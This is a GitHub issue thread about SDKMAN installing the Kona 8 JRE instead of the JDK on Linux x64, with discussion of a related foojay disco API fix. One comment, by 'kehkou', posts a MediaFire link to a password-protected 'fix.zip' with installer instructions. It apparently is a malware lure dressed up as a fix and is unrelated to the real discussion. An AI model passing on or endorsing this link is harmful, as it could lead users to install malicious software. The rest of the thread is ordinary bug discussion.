### ISSUE TITLE
Bug: Kona 8 JRE not JDK is installed on Linux x64 platform

### ISSUE THREAD

**Issue by johnshajiang** [sdkman/sdkman-cli#1311]
**Bug report**
SDKMAN installs Kona 8 JRE not JDK on Linux x64 platform.
The below API service downloads the JRE not JDK binary for Linux x64.
https://api.sdkman.io/2/broker/download/java/8.0.422-kona/linuxx64

**To reproduce**
Run the below command to try to install Kona JDK 8.0.19/8u422,
```
sdk install java 8.0.422-kona
```
but the the corresponding JRE binary is installed.

**System info**
- OS: CentOS Linux release 8.2.2.2004 (Core)
- Shell: GNU bash, version 4.4.19
- `sdk version`
```
SDKMAN!
script: 5.18.2
native: 0.4.6
```

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by johnshajiang** [comment]
In addition, I just fixed a foojay discoapi bug, which lists Kona JRE binaries for jdk package type.
The changes: https://github.com/foojayio/discoapi/commit/92f4b4ddc70938e7bc2c8dde6cffe204ffb74832

Now, the below link can display the correct Kona 8 JDK binaries on Linux x64 platform,
https://api.foojay.io/disco/v3.0/packages?package_type=jdk&latest=available&version=8&operating_system=linux&architecture=x64&distribution=kona

Not sure if this foojay discoapi bug affects this SDKMAN issue.

**Comment by marc0der** [comment]
This is not an sdkman bug so closing the issue. We should get the latest when this fix is released on the disco API.

**Comment by johnshajiang** [comment]
@marc0der 
Thanks for your reply!

However, I'm still not clear how does SDKMAN depend on dicso API.
As aforementioned, dicso API service already fixes that bug and displays the correct data, but SDKMAN doesn't yet work correctly on that point.
Does SDKMAN need to rely on disco classes?

**Comment by marc0der** [comment]
Disco is an API. We routinely consume that API for new Java releases. 

In future, please feel free to chat with us on Discord according to the contributor guidelines before opening a bug report.
